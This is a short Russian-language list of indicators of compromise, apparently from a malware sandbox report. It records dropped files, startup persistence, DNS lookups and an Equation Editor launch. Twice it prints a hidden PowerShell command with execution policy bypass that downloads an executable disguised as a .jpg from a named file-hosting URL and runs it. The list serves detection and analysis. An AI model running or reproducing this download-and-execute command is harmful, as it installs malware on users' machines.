Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\7bpafp3n.url
- https://1.top4top.net/p_14127ay3y1.jpg как %programdata%\1.exe
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_14127ay3y1.jpg','%PROGRAMDATA%\1.exe');Start-Pro...
- 1.exe
- %PROGRAMDATA%\1.exe
- %APPDATA%\addins\ursudqtz.vbs
- %APPDATA%\addins\openfiles.exe
- '1.###4top.io':443
- '1.###4top.net':443
- DNS ASK 1.###4top.net
- DNS ASK 1.###4top.io
- DNS ASK la####e2.hopto.org
- '%PROGRAMDATA%\1.exe'
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_14127ay3y1.jpg','%PROGRAMDATA%\1.exe');Start-Pro...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding